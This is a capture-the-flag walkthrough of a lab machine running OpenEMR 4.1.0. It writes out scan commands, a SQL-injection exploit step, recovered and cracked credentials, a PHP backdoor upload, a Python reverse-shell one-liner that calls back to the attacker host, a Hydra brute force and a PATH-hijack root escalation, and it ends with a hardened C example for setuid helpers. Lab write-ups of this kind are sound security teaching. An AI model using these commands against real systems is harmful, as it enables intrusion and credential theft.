First and foremost, use netdiscover or nmap to find out the IP address of the target machine.

Attacker Machine: 192.168.131.128
Target Machine : 192.168.131.146
Perform a thorough scan with Nmap to discover open ports, services and their respective version numbers.
nmap -sC -sV -p- -oN tcp_scan 192.168.131.146

Ports 21 and 80 are open. I tried to log into FTP as anonymous but failed.

Visit target website.

robots.txt file on the target website.
Perform directory brute-forcing with gobuster. After using directory-list-2.3-big.txt from dirbuster, I successfully discovered the /openemr directory.
I used raft-large-directories.txt from SecLists initially but couldn't detect the /openemr directory.

Visit http://192.168.131.146/openemr

Discovered that the version of OpenEMR is v4.1.0, which is vulnerable to SQLi.
Acquired the Python code from
poc.py

Change the url variable to the IP address of the target machine. Leave the other settings at their defaults.
Execute the Python code.

Acquired two credentials.
admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d
Crack the SHA-1 hashes through


Cracked Credentials:
admin:ackbar
medical:medical
Used the credentials to log into the OpenEMR login page.


OpenEMR dashboard.
After exploring for a while, I found that under Administration -> Files in the left panel, I could upload files to the web server.


Save a simple-backdoor.php file in the /tmp directory to upload to the web server.


Now, browse to the PHP file and click Open.
Click Save afterwards and browse to http://192.168.131.146/openemr/sites/default/images/simple-backdoor.php


Launch a netcat listener on port 2324.
Reverse shell script:
python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.131.128",2324));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
URL-encode the reverse shell script and paste it into the cmd parameter.


Under the /home directory, discovered 3 users.

Users:
medical
almirant
mysql
Try to switch user to medical with the password "medical".

It worked!
Inside the /home/medical/Documents/ directory, I discovered a password.txt file. I tried to log into root with the password given but failed.

Try to crack the password of user “almirant” through FTP using Hydra.


almirant:skywalker
I switched from user medical to almirant but found nothing interesting.
Find SUID binaries:
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

The healthcheck binary caught my eye immediately, as this is not a binary you would normally see on other machines.

Analyze the binary with strings. I found that the command is not written with an absolute path. We can create a malicious binary and modify the PATH.
I created a malicious ifconfig binary inside the /home/medical directory and included this directory in the PATH environment variable.
echo "/bin/bash" > ifconfig
chmod +x ifconfig
export PATH=/home/medical:$PATH

Now, when we run the healthcheck binary, we should be able to get a root shell.
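For contrast, here is how a setuid helper like healthcheck should invoke ifconfig so that the PATH trick above does not work. This is an added example written for this walkthrough, not the machine's own healthcheck source: it names the program by absolute path, rejects bare names and ".." components, and gives the child a fixed environment instead of the caller's PATH.

```c
// Hardened pattern for a setuid helper that must run a system tool.
// The vulnerable healthcheck calls "ifconfig" by bare name, so the caller's
// PATH decides which file runs. Here the path is checked, the child is started
// with execve() (which never searches PATH), and the environment is replaced.
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

// Fixed environment for the child: nothing from the invoking user is inherited.
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// Returns 1 if path is absolute and contains no ".." component, else 0.
int is_trusted_path(const char *path) {
    if (path == NULL || path[0] != '/') return 0;
    const char *p = path;
    while ((p = strstr(p, "..")) != NULL) {
        int at_start = (p == path) || p[-1] == '/';
        int at_end = p[2] == '\0' || p[2] == '/';
        if (at_start && at_end) return 0;
        p += 2;
    }
    return 1;
}

// Runs abs_path with argv under SAFE_ENV and returns the child's exit status.
// Returns -1 (errno = EINVAL) for a path that is not absolute/trusted.
int run_trusted(const char *abs_path, char *const argv[]) {
    if (!is_trusted_path(abs_path)) { errno = EINVAL; return -1; }
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(abs_path, argv, SAFE_ENV);   // no PATH lookup, clean environment
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char *const argv[] = { "ifconfig", "-a", NULL };
    // The bare-name call the walkthrough exploits is refused before fork():
    printf("bare name refused: %d\n", run_trusted("ifconfig", argv) == -1);
    // /sbin/ifconfig is an assumed location; adjust for the target system.
    return run_trusted("/sbin/ifconfig", argv) == 0 ? 0 : 1;
}
```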



And there we have it. Thanks for reading and enjoy hacking!